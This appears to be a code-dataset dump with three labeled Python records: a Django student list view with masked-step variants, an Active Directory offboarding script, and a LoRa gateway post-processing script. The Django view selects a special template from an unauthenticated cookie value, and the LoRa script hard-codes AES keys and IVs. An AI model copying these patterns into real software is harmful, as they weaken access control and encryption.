# template_name = 'staff/admin.html'
# elif self.request.user.is_staff:
# template_name = 'staff/staff.html'
# else:
# template_name = self.template_name
# return template_name
if self.request.COOKIES['user'] == 'farzam':
template_name = 'staff/farzam.html'
else:
template_name = self.template_name
return template_name
|
normal
|
{
"blob_id": "bcad9869e6bc9b17eee490897b4b706171381366",
"index": 2093,
"step-1": "<mask token>\n\n\nclass StudentListView(ListView):\n <mask token>\n <mask token>\n <mask token>\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass StudentListView(ListView):\n <mask token>\n <mask token>\n <mask token>\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['freshers'] = Student.objects.all().order_by('name')\n return context\n\n def get_template_names(self):\n if self.request.COOKIES['user'] == 'farzam':\n template_name = 'staff/farzam.html'\n else:\n template_name = self.template_name\n return template_name\n",
"step-3": "<mask token>\n\n\nclass StudentListView(ListView):\n model = Student\n template_name = 'staff/student_list.html'\n ordering = ['name']\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['freshers'] = Student.objects.all().order_by('name')\n return context\n\n def get_template_names(self):\n if self.request.COOKIES['user'] == 'farzam':\n template_name = 'staff/farzam.html'\n else:\n template_name = self.template_name\n return template_name\n",
"step-4": "from django.shortcuts import render\nfrom django.views.generic.list import ListView\nfrom .models import Student\n\n\nclass StudentListView(ListView):\n model = Student\n template_name = 'staff/student_list.html'\n ordering = ['name']\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['freshers'] = Student.objects.all().order_by('name')\n return context\n\n def get_template_names(self):\n if self.request.COOKIES['user'] == 'farzam':\n template_name = 'staff/farzam.html'\n else:\n template_name = self.template_name\n return template_name\n",
"step-5": "from django.shortcuts import render\nfrom django.views.generic.list import ListView\nfrom .models import Student\n\n# Create your views here.\nclass StudentListView(ListView):\n model = Student\n\n # Custom has a HIGH priority than default in any field\n\n template_name = 'staff/student_list.html'\n # template_name_suffix = '_list'\n ordering = ['name']\n # context_object_name = 'students'\n\n def get_queryset(self):\n return Student.objects.filter(course='Python')\n\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['freshers'] = Student.objects.all().order_by('name')\n\n return context\n\n\n def get_template_names(self):\n # if self.request.user.is_superuser:\n # template_name = 'staff/admin.html'\n # elif self.request.user.is_staff:\n # template_name = 'staff/staff.html'\n # else:\n # template_name = self.template_name\n # return template_name\n\n\n if self.request.COOKIES['user'] == 'farzam':\n template_name = 'staff/farzam.html'\n else:\n template_name = self.template_name\n\n return template_name",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import json
import os
import ssl
from ldap3 import Server, Connection, Tls, SUBTREE, ALL
# Include root CA certificate path if you use a self signed AD certificate
SSL_CERT_PATH = "path/to/cert.pem"
# Include the FQDN of your Domain Controller here
FQDN = "ad.example.com"
# Search base is the CN of the container where your users live
search_base='OU=Sites,DC=ad,DC=example,DC=com'
def deprovision_AD(email):
memberOf_list = []
ad_info = get_secret("TS/Active-Directory-Offboarding-Info")
# TODO: Get the into from the secret above and turn into env variables instead
ad_info_dict = json.loads(ad_info)
# Binding to AD with latest form of TLS available
tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.PROTOCOL_TLS)
server = Server(FQDN, use_ssl=True, tls=tls_configuration)
conn = Connection(server, ad_info_dict["sa_username_dn"], ad_info_dict["sa_password"], auto_bind=True,
raise_exceptions=True)
# Find user in AD based off of 'mail' attribute
search_filter = "(&(objectClass=user)(mail={}))".format(email)
entry_generator = conn.extend.standard.paged_search(search_base=search_base,
search_filter=search_filter,
search_scope=SUBTREE,
attributes=['memberOf'],
paged_size=5,
generator=True)
for entry in entry_generator:
dn = entry['dn']
relative_dn = dn.split(',')[0]
groups = entry['raw_attributes']['memberOf']
for group in groups:
group_str = str(group)
memberOf_list.append(group_str[2:-1])
# There is a comment before each offboarding task. Comment out the ones you'd like to skip
try:
# Loop through groups and remove user from those groups
for group in memberOf_list:
conn.extend.microsoft.remove_members_from_groups(dn, group)
# Add user to security group
conn.extend.microsoft.add_members_to_groups(dn, "<dn of new group>")
# Disable account
conn.modify(dn, changes={'userAccountControl': (2, '514')})
# Move to different OU
conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior="<dn of new OU>")
# Delete account
## TODO: Figure out the command to delete the AD account
# Close connection
conn.unbind()
return "Success"
except NameError:
return "A user with that email address does not exist inside Active Directory"
def __main__():
# TODO: Figure out how to populate this as an env
email = input("Please input the departing user's email address: ")
ad_result = deprovision_AD(email)
print(ad_result)
|
normal
|
{
"blob_id": "9ca5c052db43c1d8b0cafa18038b3ebcd80067f7",
"index": 4710,
"step-1": "<mask token>\n\n\ndef __main__():\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n",
"step-2": "<mask token>\n\n\ndef deprovision_AD(email):\n memberOf_list = []\n ad_info = get_secret('TS/Active-Directory-Offboarding-Info')\n ad_info_dict = json.loads(ad_info)\n tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.\n PROTOCOL_TLS)\n server = Server(FQDN, use_ssl=True, tls=tls_configuration)\n conn = Connection(server, ad_info_dict['sa_username_dn'], ad_info_dict[\n 'sa_password'], auto_bind=True, raise_exceptions=True)\n search_filter = '(&(objectClass=user)(mail={}))'.format(email)\n entry_generator = conn.extend.standard.paged_search(search_base=\n search_base, search_filter=search_filter, search_scope=SUBTREE,\n attributes=['memberOf'], paged_size=5, generator=True)\n for entry in entry_generator:\n dn = entry['dn']\n relative_dn = dn.split(',')[0]\n groups = entry['raw_attributes']['memberOf']\n for group in groups:\n group_str = str(group)\n memberOf_list.append(group_str[2:-1])\n try:\n for group in memberOf_list:\n conn.extend.microsoft.remove_members_from_groups(dn, group)\n conn.extend.microsoft.add_members_to_groups(dn, '<dn of new group>')\n conn.modify(dn, changes={'userAccountControl': (2, '514')})\n conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior=\n '<dn of new OU>')\n conn.unbind()\n return 'Success'\n except NameError:\n return (\n 'A user with that email address does not exist inside Active Directory'\n )\n\n\ndef __main__():\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n",
"step-3": "<mask token>\nSSL_CERT_PATH = 'path/to/cert.pem'\nFQDN = 'ad.example.com'\nsearch_base = 'OU=Sites,DC=ad,DC=example,DC=com'\n\n\ndef deprovision_AD(email):\n memberOf_list = []\n ad_info = get_secret('TS/Active-Directory-Offboarding-Info')\n ad_info_dict = json.loads(ad_info)\n tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.\n PROTOCOL_TLS)\n server = Server(FQDN, use_ssl=True, tls=tls_configuration)\n conn = Connection(server, ad_info_dict['sa_username_dn'], ad_info_dict[\n 'sa_password'], auto_bind=True, raise_exceptions=True)\n search_filter = '(&(objectClass=user)(mail={}))'.format(email)\n entry_generator = conn.extend.standard.paged_search(search_base=\n search_base, search_filter=search_filter, search_scope=SUBTREE,\n attributes=['memberOf'], paged_size=5, generator=True)\n for entry in entry_generator:\n dn = entry['dn']\n relative_dn = dn.split(',')[0]\n groups = entry['raw_attributes']['memberOf']\n for group in groups:\n group_str = str(group)\n memberOf_list.append(group_str[2:-1])\n try:\n for group in memberOf_list:\n conn.extend.microsoft.remove_members_from_groups(dn, group)\n conn.extend.microsoft.add_members_to_groups(dn, '<dn of new group>')\n conn.modify(dn, changes={'userAccountControl': (2, '514')})\n conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior=\n '<dn of new OU>')\n conn.unbind()\n return 'Success'\n except NameError:\n return (\n 'A user with that email address does not exist inside Active Directory'\n )\n\n\ndef __main__():\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n",
"step-4": "import json\nimport os\nimport ssl\nfrom ldap3 import Server, Connection, Tls, SUBTREE, ALL\nSSL_CERT_PATH = 'path/to/cert.pem'\nFQDN = 'ad.example.com'\nsearch_base = 'OU=Sites,DC=ad,DC=example,DC=com'\n\n\ndef deprovision_AD(email):\n memberOf_list = []\n ad_info = get_secret('TS/Active-Directory-Offboarding-Info')\n ad_info_dict = json.loads(ad_info)\n tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.\n PROTOCOL_TLS)\n server = Server(FQDN, use_ssl=True, tls=tls_configuration)\n conn = Connection(server, ad_info_dict['sa_username_dn'], ad_info_dict[\n 'sa_password'], auto_bind=True, raise_exceptions=True)\n search_filter = '(&(objectClass=user)(mail={}))'.format(email)\n entry_generator = conn.extend.standard.paged_search(search_base=\n search_base, search_filter=search_filter, search_scope=SUBTREE,\n attributes=['memberOf'], paged_size=5, generator=True)\n for entry in entry_generator:\n dn = entry['dn']\n relative_dn = dn.split(',')[0]\n groups = entry['raw_attributes']['memberOf']\n for group in groups:\n group_str = str(group)\n memberOf_list.append(group_str[2:-1])\n try:\n for group in memberOf_list:\n conn.extend.microsoft.remove_members_from_groups(dn, group)\n conn.extend.microsoft.add_members_to_groups(dn, '<dn of new group>')\n conn.modify(dn, changes={'userAccountControl': (2, '514')})\n conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior=\n '<dn of new OU>')\n conn.unbind()\n return 'Success'\n except NameError:\n return (\n 'A user with that email address does not exist inside Active Directory'\n )\n\n\ndef __main__():\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n",
"step-5": "import json\nimport os\n\nimport ssl\n\nfrom ldap3 import Server, Connection, Tls, SUBTREE, ALL\n\n# Include root CA certificate path if you use a self signed AD certificate\nSSL_CERT_PATH = \"path/to/cert.pem\"\n\n# Include the FQDN of your Domain Controller here\nFQDN = \"ad.example.com\"\n\n# Search base is the CN of the container where your users live\nsearch_base='OU=Sites,DC=ad,DC=example,DC=com'\n\ndef deprovision_AD(email):\n memberOf_list = []\n ad_info = get_secret(\"TS/Active-Directory-Offboarding-Info\")\n # TODO: Get the into from the secret above and turn into env variables instead\n ad_info_dict = json.loads(ad_info)\n\n # Binding to AD with latest form of TLS available\n tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.PROTOCOL_TLS)\n server = Server(FQDN, use_ssl=True, tls=tls_configuration)\n\n conn = Connection(server, ad_info_dict[\"sa_username_dn\"], ad_info_dict[\"sa_password\"], auto_bind=True,\n raise_exceptions=True)\n\n # Find user in AD based off of 'mail' attribute\n search_filter = \"(&(objectClass=user)(mail={}))\".format(email)\n entry_generator = conn.extend.standard.paged_search(search_base=search_base,\n search_filter=search_filter,\n search_scope=SUBTREE,\n attributes=['memberOf'],\n paged_size=5,\n generator=True)\n\n for entry in entry_generator:\n dn = entry['dn']\n relative_dn = dn.split(',')[0]\n groups = entry['raw_attributes']['memberOf']\n for group in groups:\n group_str = str(group)\n memberOf_list.append(group_str[2:-1])\n\n # There is a comment before each offboarding task. Comment out the ones you'd like to skip\n\n try:\n # Loop through groups and remove user from those groups\n for group in memberOf_list:\n conn.extend.microsoft.remove_members_from_groups(dn, group)\n\n # Add user to security group\n conn.extend.microsoft.add_members_to_groups(dn, \"<dn of new group>\")\n\n # Disable account\n conn.modify(dn, changes={'userAccountControl': (2, '514')})\n\n # Move to different OU\n conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior=\"<dn of new OU>\")\n\n # Delete account\n ## TODO: Figure out the command to delete the AD account\n\n # Close connection\n conn.unbind()\n return \"Success\"\n\n except NameError:\n return \"A user with that email address does not exist inside Active Directory\"\n\n\ndef __main__():\n # TODO: Figure out how to populate this as an env\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#------------------------------------------------------------
# Copyright 2016 Congduc Pham, University of Pau, France.
#
# Congduc.Pham@univ-pau.fr
#
# This file is part of the low-cost LoRa gateway developped at University of Pau
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the program. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------------
# IMPORTANT
# Parts that can be modified are identified with
#////////////////////////////////////////////////////////////
# TEXT
# END
#////////////////////////////////////////////////////////////
import sys
import select
import threading
from threading import Timer
import time
import datetime
import getopt
import os
import json
import re
#////////////////////////////////////////////////////////////
# ADD HERE BOOLEAN VARIABLES TO SUPPORT OTHER CLOUDS
# OR VARIABLES FOR YOUR OWN NEEDS
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#with firebase support?
#------------------------------------------------------------
_firebase=False
#------------------------------------------------------------
#with thingspeak support?
#------------------------------------------------------------
_thingspeak=False
#plot snr instead of seq
_thingspeaksnr=False
#------------------------------------------------------------
#with sensorcloud support?
#------------------------------------------------------------
_sensorcloud=False
#------------------------------------------------------------
#with grovestreams support?
#------------------------------------------------------------
_grovestreams=False
#------------------------------------------------------------
#with fiware support?
#------------------------------------------------------------
_fiware=False
#////////////////////////////////////////////////////////////
# ADD HERE APP KEYS THAT YOU WANT TO ALLOW FOR YOUR GATEWAY
#////////////////////////////////////////////////////////////
# NOTE: the format of the application key list has changed from
# a list of list, to a list of string that will be process as
# a byte array. Doing so wilL allow for dictionary construction
# using the appkey to retrieve information such as encryption key,...
app_key_list = [
#for testing
'****',
#change here your application key
'\x01\x02\x03\x04',
'\x05\x06\x07\x08'
]
#////////////////////////////////////////////////////////////
#FOR AES DECRYPTION
#////////////////////////////////////////////////////////////
#put your key here, should match the end-device's key
aes_key="0123456789010123"
#put your initialisation vector here, should match the end-device's initialisation vector
aes_iv="\x9a\xd0\x30\x02\x00\x00\x00\x00\x9a\xd0\x30\x02\x00\x00\x00\x00"
#aes_iv="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
#association between appkey and aes_key
appkey_aeskey = {
'\x01\x02\x03\x04':"0123456789010123",
'\x05\x06\x07\x08':"0123456789010123"
}
#association between appkey and aes_iv
appkey_aesiv = {
'\x01\x02\x03\x04':"\x9a\xd0\x30\x02\x00\x00\x00\x00\x9a\xd0\x30\x02\x00\x00\x00\x00",
'\x05\x06\x07\x08':"\x9a\xd0\x30\x02\x00\x00\x00\x00\x9a\xd0\x30\x02\x00\x00\x00\x00"
}
# END
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#header packet information
#------------------------------------------------------------
HEADER_SIZE=4
APPKEY_SIZE=4
PKT_TYPE_DATA=0x10
PKT_TYPE_ACK=0x20
PKT_FLAG_ACK_REQ=0x08
PKT_FLAG_DATA_ENCRYPTED=0x04
PKT_FLAG_DATA_WAPPKEY=0x02
PKT_FLAG_DATA_ISBINARY=0x01
#------------------------------------------------------------
#last pkt information
#------------------------------------------------------------
dst=0
ptype=0
ptypestr="N/A"
src=0
seq=0
datalen=0
SNR=0
RSSI=0
bw=0
cr=0
sf=0
#------------------------------------------------------------
#------------------------------------------------------------
#will ignore lines beginning with '?'
#------------------------------------------------------------
_ignoreComment=1
#------------------------------------------------------------
#with mongoDB support?
#------------------------------------------------------------
_mongodb = False
#------------------------------------------------------------
#log gateway message?
#------------------------------------------------------------
_logGateway=0
#------------------------------------------------------------
#raw output from gateway?
#------------------------------------------------------------
_rawFormat=0
#------------------------------------------------------------
_ourcustomFormat=0;
_lorawanFormat=0
#------------------------------------------------------------
#------------------------------------------------------------
#check for app key?
#------------------------------------------------------------
_wappkey=0
#------------------------------------------------------------
the_app_key = '\x00\x00\x00\x00'
#valid app key? by default we do not check for the app key
_validappkey=1
#------------------------------------------------------------
#for local AES decrypting
#------------------------------------------------------------
_aes=0
_hasClearData=0
#------------------------------------------------------------
#open json file to recover gateway_address
#------------------------------------------------------------
f = open(os.path.expanduser("local_conf.json"),"r")
lines = f.readlines()
f.close()
array = ""
#get all the lines in a string
for line in lines :
array += line
#change it into a python array
json_array = json.loads(array)
#set the gateway_address for having different log filenames
_gwaddr = json_array["gateway_conf"]["gateway_ID"]
#////////////////////////////////////////////////////////////
# CHANGE HERE THE VARIOUS PATHS FOR YOUR LOG FILES
#////////////////////////////////////////////////////////////
_folder_path = "/home/pi/Dropbox/LoRa-test/"
_gwlog_filename = _folder_path+"gateway_"+str(_gwaddr)+".log"
_telemetrylog_filename = _folder_path+"telemetry_"+str(_gwaddr)+".log"
# END
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#initialize gateway DHT22 sensor
#------------------------------------------------------------
_gw_dht22 = json_array["gateway_conf"]["dht22"]
_date_save_dht22 = None
if(_gw_dht22):
print "Use DHT22 to get gateway temperature and humidity level"
#read values from dht22 in the gateway box
sys.path.insert(0, os.path.expanduser('./sensors_in_raspi/dht22'))
from read_dht22 import get_dht22_values
_temperature = 0
_humidity = 0
# retrieve dht22 values
def save_dht22_values():
global _temperature, _humidity, _date_save_dht22
_humidity, _temperature = get_dht22_values()
_date_save_dht22 = datetime.datetime.utcnow()
print "Gateway TC : "+_temperature+" C | HU : "+_humidity+" % at "+str(_date_save_dht22)
#save values from the gateway box's DHT22 sensor, if _mongodb is true
if(_mongodb):
#saving data in a JSON var
str_json_data = "{\"th\":"+_temperature+", \"hu\":"+_humidity+"}"
#creating document to add
doc = {
"type" : "DATA_GW_DHT22",
"gateway_eui" : _gwaddr,
"node_eui" : "gw",
"snr" : "",
"rssi" : "",
"cr" : "",
"datarate" : "",
"time" : _date_save_dht22,
"data" : json.dumps(json.loads(str_json_data))
}
#adding the document
add_document(doc)
def dht22_target():
while True:
print "Getting gateway temperature"
save_dht22_values()
sys.stdout.flush()
global _gw_dht22
time.sleep(_gw_dht22)
#------------------------------------------------------------
#for managing the input data when we can have aes encryption
#------------------------------------------------------------
_linebuf="the line buffer"
_linebuf_idx=0
_has_linebuf=0
def getSingleChar():
global _has_linebuf
# if we have a valid _linebuf then read from _linebuf
if _has_linebuf==1:
global _linebuf_idx
global _linebuf
if _linebuf_idx < len(_linebuf):
_linebuf_idx = _linebuf_idx + 1
return _linebuf[_linebuf_idx-1]
else:
# no more character from _linebuf, so read from stdin
_has_linebuf = 0
return sys.stdin.read(1)
else:
return sys.stdin.read(1)
def getAllLine():
global _linebuf_idx
p=_linebuf_idx
_linebuf_idx = 0
global _has_linebuf
_has_linebuf = 0
global _linebuf
# return the remaining of the string and clear the _linebuf
return _linebuf[p:]
def fillLinebuf(n):
global _linebuf_idx
_linebuf_idx = 0
global _has_linebuf
_has_linebuf = 1
global _linebuf
# fill in our _linebuf from stdin
_linebuf=sys.stdin.read(n)
#////////////////////////////////////////////////////////////
# ADD HERE OPTIONS THAT YOU MAY WANT TO ADD
# BE CAREFUL, IT IS NOT ADVISED TO REMOVE OPTIONS UNLESS YOU
# REALLY KNOW WHAT YOU ARE DOING
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#for parsing the options
#------------------------------------------------------------
def main(argv):
try:
opts, args = getopt.getopt(argv,'iftLam:',[\
'ignorecomment',\
'firebase',\
'thingspeak',\
'retrythsk',\
'thingspeaksnr',\
'fiware',\
'sensorcloud',\
'grovestreams',\
'loggw',\
'addr',\
'wappkey',\
'raw',\
'aes',\
'mongodb'])
except getopt.GetoptError:
print 'post_processing_gw '+\
'-i/--ignorecomment '+\
'-f/--firebase '+\
'-t/--thingspeak '+\
'--retrythsk '+\
'--thingspeaksnr '+\
'--fiware '+\
'--sensorcloud '+\
'--grovestreams '+\
'-L/--loggw '+\
'-a/--addr '+\
'--wappkey '+\
'--raw '+\
'--aes '+\
'-m/--mongodb'
sys.exit(2)
for opt, arg in opts:
if opt in ("-i", "--ignorecomment"):
print("will ignore commented lines")
global _ignoreComment
_ignoreComment = 1
elif opt in ("-f", "--firebase"):
print("will enable firebase support")
global _firebase
_firebase = True
global firebase_uploadSingleData
from FireBase import firebase_uploadSingleData
elif opt in ("-t", "--thingspeak"):
print("will enable thingspeak support")
global _thingspeak
_thingspeak = True
global thingspeak_uploadSingleData, thingspeak_uploadMultipleData
from ThingSpeak import thingspeak_uploadSingleData, thingspeak_uploadMultipleData
elif opt in ("--retrythsk"):
print("will enable thingspeak retry")
global thingspeak_setRetry
from ThingSpeak import thingspeak_setRetry
#set retry to True
thingspeak_setRetry(True)
elif opt in ("--thingspeaksnr"):
print("will plot snr instead of seq")
global _thingspeaksnr
_thingspeaksnr = True
elif opt in ("--fiware"):
print("will enable fiware support")
global _fiware
_fiware = True
elif opt in ("--sensorcloud"):
print("will enable sensorcloud support")
global _sensorcloud
_sensorcloud = True
global sensorcloud_uploadSingleData
from SensorCloud import sensorcloud_uploadSingleData
elif opt in ("--grovestreams"):
print("will enable grovestreams support")
global _grovestreams
_grovestreams = True
global grovestreams_uploadSingleData
from GroveStreams import grovestreams_uploadSingleData
elif opt in ("-L", "--loggw"):
print("will log gateway message prefixed by ^$")
global _logGateway
_logGateway = 1
elif opt in ("-a", "--addr"):
global _gwaddr
_gwaddr = arg
print("overwrite: will use _"+str(_gwaddr)+" for gateway and telemetry log files")
elif opt in ("--wappkey"):
global _wappkey
_wappkey = 1
global _validappkey
_validappkey=0
print("will check for correct app key")
elif opt in ("--raw"):
global _rawFormat
_rawFormat = 1
print("raw output from gateway. post_processing_gw will handle packet format")
elif opt in ("--aes"):
global _aes
_aes = 1
global AES
from Crypto.Cipher import AES
print("enable AES encrypted data")
elif opt in ("-m", "--mongodb"):
print("will enable local MongoDB support, max months to store is "+arg)
global _mongodb
_mongodb = True
global add_document, remove_if_new_month, mongodb_set_max_months
from MongoDB import add_document, remove_if_new_month, mongodb_set_max_months
#setting max months
mongodb_set_max_months(int(arg))
# END
#////////////////////////////////////////////////////////////
if __name__ == "__main__":
main(sys.argv[1:])
#gateway dht22
if (_gw_dht22):
print "Starting thread to measure gateway temperature"
t = threading.Thread(target=dht22_target)
t.daemon = True
t.start()
print "Current working directory: "+os.getcwd()
while True:
sys.stdout.flush()
ch = getSingleChar()
#expected prefixes
# ^p indicates a ctrl pkt info ^pdst(%d),ptype(%d),src(%d),seq(%d),len(%d),SNR(%d),RSSI=(%d) for the last received packet
# example: ^p1,16,3,0,234,8,-45
#
# ^r indicate a ctrl radio info ^rbw,cr,sf for the last received packet
# example: ^r500,5,12
#
# ^$ indicates an output (debug or log purposes) from the gateway that should be logged in the (Dropbox) gateway.log file
# example: ^$Set LoRa mode 4
#
# ^l indicates a ctrl LAS info ^lsrc(%d),type(%d)
# type is 1 for DSP_REG, 2 for DSP_INIT, 3 for DSP_UPDT, 4 for DSP_DATA
# example: ^l3,4
#
# \$ indicates a message that should be logged in the (Dropbox) telemetry.log file
# example: \$hello -> hello will be logged in the following format
# (src=3 seq=0 len=6 SNR=8 RSSI=-54) 2015-10-16T14:47:44.072230> hello
#
# \& indicates a message that should be logged in the firebase cloud database
# example: \&hello -> hello will be logged in json format
#
# \! indicates a message that should be logged on a thingspeak channel
# example: \!SGSH52UGPVAUYG3S#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at default field, i.e. field 1
# \!2#9.4 -> 9.4 will be logged in the default channel at field 2
# \!SGSH52UGPVAUYG3S#2#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at field 2
#
# you can log other information such as src, seq, len, SNR and RSSI on specific fields
#
# \xFF\xFE indicates radio data prefix
#
#
#------------------------------------------------------------
# '^' is reserved for control information from the gateway
#------------------------------------------------------------
if (ch=='^'):
now = datetime.datetime.utcnow()
ch=sys.stdin.read(1)
if (ch=='p'):
data = sys.stdin.readline()
print now.isoformat()
print "rcv ctrl pkt info (^p): "+data,
arr = map(int,data.split(','))
print "splitted in: ",
print arr
dst=arr[0]
ptype=arr[1]
ptypestr="N/A"
if ((ptype & 0xF0)==PKT_TYPE_DATA):
ptypestr="DATA"
if (ptype & PKT_FLAG_DATA_ISBINARY)==PKT_FLAG_DATA_ISBINARY:
ptypestr = ptypestr + " IS_BINARY"
if (ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY:
ptypestr = ptypestr + " WAPPKEY"
if (ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED:
ptypestr = ptypestr + " ENCRYPTED"
if (ptype & PKT_FLAG_ACK_REQ)==PKT_FLAG_ACK_REQ:
ptypestr = ptypestr + " ACK_REQ"
if ((ptype & 0xF0)==PKT_TYPE_ACK):
ptypestr="ACK"
src=arr[2]
seq=arr[3]
datalen=arr[4]
SNR=arr[5]
RSSI=arr[6]
if (_rawFormat==0):
info_str="(dst=%d type=0x%.2X(%s) src=%d seq=%d len=%d SNR=%d RSSI=%d)" % (dst,ptype,ptypestr,src,seq,datalen,SNR,RSSI)
else:
info_str="rawFormat(len=%d SNR=%d RSSI=%d)" % (datalen,SNR,RSSI)
print info_str
# TODO: maintain statistics from received messages and periodically add these informations in the gateway.log file
if (ch=='r'):
data = sys.stdin.readline()
print "rcv ctrl radio info (^r): "+data,
arr = map(int,data.split(','))
print "splitted in: ",
print arr
bw=arr[0]
cr=arr[1]
sf=arr[2]
info_str="(BW=%d CR=%d SF=%d)" % (bw,cr,sf)
print info_str
if (ch=='t'):
rcv_timestamp = sys.stdin.readline()
print "rcv timestamp (^t): "+rcv_timestamp
if (ch=='l'):
# TODO: LAS service
print 'not implemented yet'
if (ch=='$' and _logGateway==1):
data = sys.stdin.readline()
print "rcv gw output to log (^$): "+data,
f=open(os.path.expanduser(_gwlog_filename),"a")
f.write(now.isoformat()+'> ')
f.write(data)
f.close()
continue
#------------------------------------------------------------
# '\' is reserved for message logging service
#------------------------------------------------------------
if (ch=='\\'):
now = datetime.datetime.utcnow()
if _validappkey==1:
print 'valid app key: accept data'
ch=getSingleChar()
if (ch=='$'): #log on Dropbox
data = getAllLine()
print "rcv msg to log (\$) on dropbox: "+data,
f=open(os.path.expanduser(_telemetrylog_filename),"a")
f.write(info_str+' ')
f.write(now.isoformat()+'> ')
f.write(data)
f.close()
#/////////////////////////////////////////////////////////////
# YOU CAN MODIFY HERE HOW YOU WANT DATA TO BE PUSHED TO CLOUDS
# WE PROVIDE EXAMPLES FOR THINGSPEAK, GROVESTREAM
# IT IS ADVISED TO USE A SEPERATE PYTHON SCRIPT PER CLOUD
#////////////////////////////////////////////////////////////
elif (ch=='&' and _firebase): #log on Firebase
ldata = getAllLine()
print 'rcv msg to log (\&) on firebase: '+data
firebase_msg = {
'dst':dst,
'type':ptypestr,
'gateway_eui' : _gwaddr,
'node_eui':src,
'seq':seq,
'len':datalen,
'snr':SNR,
'rssi':RSSI,
'cr' : cr,
'datarate' : "SF"+str(sf)+"BW"+str(bw),
'time':now.isoformat(),
'info_str':info_str+' '+now.isoformat()+'> '+ldata,
'data':ldata
}
if _mongodb :
#------------------
#saving in MongoDB
#------------------
#get the data
data = ldata.split('/')
#change data in two arrays : nomenclature_array and value_array
iteration = 0
nomenclature_array = []
value_array = []
while iteration<len(data) :
if (iteration == 0 or iteration%2 == 0) :
nomenclature_array.append(data[iteration])
else :
value_array.append(data[iteration])
iteration += 1
#check if new month
remove_if_new_month(now)
print("MongoDB: saving the document in the collection...")
#saving data in a JSON var
str_json_data = "{"
iteration = 0
while iteration < len(nomenclature_array) :
#last iteration, do not add "," at the end
if iteration == len(nomenclature_array)-1 :
str_json_data += "\""+nomenclature_array[iteration]+"\" : "+value_array[iteration]
else :
str_json_data += "\""+nomenclature_array[iteration]+"\" : "+value_array[iteration]+", "
iteration += 1
str_json_data += "}"
#creating document to add
doc = {
"type" : ptypestr,
"gateway_eui" : _gwaddr,
"node_eui" : src,
"snr" : SNR,
"rssi" : RSSI,
"cr" : cr,
"datarate" : "SF"+str(sf)+"BW"+str(bw),
"time" : now,
"data" : json.dumps(json.loads(str_json_data))
}
#adding the document
add_document(doc)
print("MongoDB: saving done")
sensor_entry='sensor%d'% (src)
msg_entry='msg%d' % (seq)
#upload data to firebase
firebase_uploadSingleData(firebase_msg, sensor_entry, msg_entry, now)
elif (ch=='!'): #log on thingspeak, grovestreams, sensorcloud and connectingnature
ldata = getAllLine()
# get number of '#' separator
nsharp = ldata.count('#')
#no separator
if nsharp==0:
#will use default channel and field
data=['','']
#contains ['', '', "s1", s1value, "s2", s2value, ...]
data_array = data + re.split("/", ldata)
elif nsharp==1:
#only 1 separator
data_array = re.split("#|/", ldata)
#if the first item has length > 1 then we assume that it is a channel write key
if len(data_array[0])>1:
#insert '' to indicate default field
data_array.insert(1,'');
else:
#insert '' to indicate default channel
data_array.insert(0,'');
else:
#contains [channel, field, "s1", s1value, "s2", s2value, ...]
data_array = re.split("#|/", ldata)
#just in case we have an ending CR or 0
data_array[len(data_array)-1] = data_array[len(data_array)-1].replace('\n', '')
data_array[len(data_array)-1] = data_array[len(data_array)-1].replace('\0', '')
#test if there are characters at the end of each value, then delete these characters
i = 3
while i < len(data_array) :
while not data_array[i][len(data_array[i])-1].isdigit() :
data_array[i] = data_array[i][:-1]
i += 2
if _mongodb :
#------------------
#saving in MongoDB
#------------------
#check if new month
remove_if_new_month(now)
print("MongoDB: saving the document in the collection...")
#saving data in a JSON var
str_json_data = "{"
#start from the first nomenclature
iteration = 2
